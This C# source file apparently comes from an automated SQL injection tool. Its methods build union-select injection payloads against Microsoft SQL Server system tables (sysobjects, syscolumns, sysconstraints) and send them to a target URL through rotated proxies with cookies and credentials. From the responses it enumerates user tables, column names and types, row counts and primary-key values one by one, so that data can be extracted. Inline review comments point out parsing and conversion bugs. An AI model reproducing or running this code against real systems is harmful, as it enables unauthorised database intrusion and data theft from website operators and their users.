        /// <summary>
        /// Reads metadata for the first column of table <paramref name="TableID"/> whose colid is
        /// greater than <paramref name="FieldID"/>. Two union-select requests are issued through the
        /// current vector parameter: one against syscolumns ("name:xtype") and one against
        /// sysconstraints (":status"). Every call mutates <c>_AttackParams[_VectorName]</c>.
        /// </summary>
        /// <param name="TableID">Table object id (matched against syscolumns.id / sysconstraints.id).</param>
        /// <param name="FieldID">Column id after which to look; only colid &gt; FieldID is selected.</param>
        /// <returns>A <see cref="GlobalDS.Field"/> with FieldName, DataType and IsPrimary populated.</returns>
        private GlobalDS.Field GetFieldData(long TableID, int FieldID)
        {
            GlobalDS.Field retVal = new GlobalDS.Field();

            StringBuilder WhereClause = new StringBuilder();

            // Both operands are numeric parameters of this method, so only digits end up in the clause.
            WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);

            // char(58) is ':'; it separates the column name from its xtype in the returned text.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());


            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            // Requires at least one ':' in the parsed text; values[1] throws IndexOutOfRangeException
            // otherwise, and Convert.ToInt64 throws FormatException if the xtype part is not numeric.
            string[] values = PulledData.Split(':');

            retVal.FieldName = values[0];
            retVal.DataType  = GetSqlDataType(Convert.ToInt64(values[1].Trim()));

            // Second request: ":status" for this exact column from sysconstraints.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            // Empty text means no matching constraint row; IsPrimary then keeps the default of a fresh Field.
            if (PulledData.Length > 0)
            {
                // Strip the leading ':' marker, then take the low bit of status as the primary-key flag.
                PulledData       = PulledData.Substring(1, PulledData.Length - 1);
                retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
            }

            return(retVal);
        }
        /// <summary>
        /// Fetches the next user table after <paramref name="PreviousTableID"/> and its row count.
        /// The first request selects "name:id" from sysobjects (xtype=char(85), i.e. 'U'); the
        /// second selects ":count(*)" from the table just found. Both go through
        /// <c>_AttackParams[_VectorName]</c>, which this method overwrites.
        /// </summary>
        /// <param name="PreviousTableID">Only objects with id greater than this value are considered.</param>
        /// <returns>
        /// A <see cref="GlobalDS.Table"/> with Name, ObjectID and RecordCount set; RecordCount is -1
        /// when the count request yields no text.
        /// </returns>
        private GlobalDS.Table RetrieveTable(long PreviousTableID)
        {
            GlobalDS.Table retVal = new GlobalDS.Table();

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());

            string ResultPage, ResultText;

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            // Needs at least one ':' in the parsed text (values[1]) and a numeric id after it;
            // unlike GetFieldData, the id part is not trimmed before conversion.
            string[] values = ResultText.Split(':');

            retVal.Name     = values[0];
            retVal.ObjectID = Convert.ToInt64(values[1]);

            // The table name returned by the previous request is used directly as the FROM source; no where clause.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            if (ResultText.Length > 0)
            {
                // Drop the leading ':' marker before converting the count.
                ResultText = ResultText.Substring(1, ResultText.Length - 1);

                retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
            }
            else
            {
                // Sentinel: the count could not be read.
                retVal.RecordCount = -1;
            }
            return(retVal);
        }
        /// <summary>
        /// Returns the number of user tables (sysobjects rows with xtype=char(85), i.e. 'U').
        /// The selected text is wrapped in ':' markers on both sides (char(58)), which are stripped
        /// before conversion. Overwrites <c>_AttackParams[_VectorName]</c>.
        /// </summary>
        /// <returns>The parsed count.</returns>
        private long GetTableCount()
        {
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58)+convert(char,count(name))+char(58)", "sysobjects", "xtype=char(85)");

            string ResultPage  = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string PulledCount = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            // Remove the leading and trailing ':' markers. Unlike the other retrieval methods there is
            // no empty check here: a parsed text shorter than two characters makes Substring throw
            // ArgumentOutOfRangeException, and a non-numeric remainder makes Convert.ToInt64 throw FormatException.
            PulledCount = PulledCount.Substring(1, PulledCount.Length - 2).Trim();

            return(Convert.ToInt64(PulledCount));
        }
        /// <summary>
        /// Advances a primary-key cursor over <paramref name="TableName"/>: selects
        /// min(<paramref name="KeyName"/>) greater than the current key value (or the overall minimum
        /// when <paramref name="CurrentPrimaryKey"/> names a different key) and packages the result
        /// as the next <see cref="GlobalDS.PrimaryKey"/>. Overwrites <c>_AttackParams[_VectorName]</c>.
        /// </summary>
        /// <param name="TableName">Table used as the FROM source; inserted into the query as-is.</param>
        /// <param name="KeyName">Column used both in min() and in the comparison; inserted into the query as-is.</param>
        /// <param name="CurrentPrimaryKey">Previous cursor position; only consulted when its Name equals <paramref name="KeyName"/>.</param>
        /// <param name="PrimaryKeyType">Decides how the fetched value is rendered into <c>Value</c> (see the switch below).</param>
        /// <returns>
        /// A key whose <c>Name</c> is <paramref name="KeyName"/>, <c>OutputValue</c> is the raw text between
        /// the ':' markers, and <c>Value</c> is that text rewritten for reuse in the next where clause.
        /// </returns>
        private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
        {
            StringBuilder WhereClause = new StringBuilder();

            // Ordinal string equality; when the key name differs the where clause stays empty and
            // the query returns the table's overall minimum.
            if (CurrentPrimaryKey.Name == KeyName)
            {
                WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
            }

            // char(58) is ':'; the minimum is wrapped in ':' on both sides so it can be located in the response.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());

            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            // Strip both ':' markers; throws ArgumentOutOfRangeException if fewer than two characters came back.
            ResultText = ResultText.Substring(1, ResultText.Length - 2);

            string WorkingText = "";

            switch (PrimaryKeyType)
            {
            case SqlDbType.VarChar:
            case SqlDbType.Char:
            case SqlDbType.NChar:
            case SqlDbType.NText:
            case SqlDbType.NVarChar:
            case SqlDbType.Text:
                StringBuilder ElementBuilder = new StringBuilder();

                // Character-typed keys: emit one "char(n) + " term per character of ResultText.
                // NOTE(review): Char.GetNumericValue returns a digit's numeric value (-1 for non-digit
                // characters), not the character code; the terms reflect that.
                char[] TextElements = ResultText.ToCharArray();
                for (int i = 0; i < TextElements.Length; i++)
                {
                    ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
                }
                // Throws ArgumentOutOfRangeException when ResultText was empty (nothing was appended).
                ElementBuilder.Remove(ElementBuilder.Length - 2, 2);                       // remove trailing '+ '

                WorkingText = ElementBuilder.ToString();
                break;

            default:
                // Non-character keys are reused verbatim, whitespace trimmed.
                WorkingText = ResultText.Trim();
                break;
            }



            GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
            retVal.Name        = KeyName;
            retVal.Value       = WorkingText;
            retVal.OutputValue = ResultText;

            return(retVal);
        }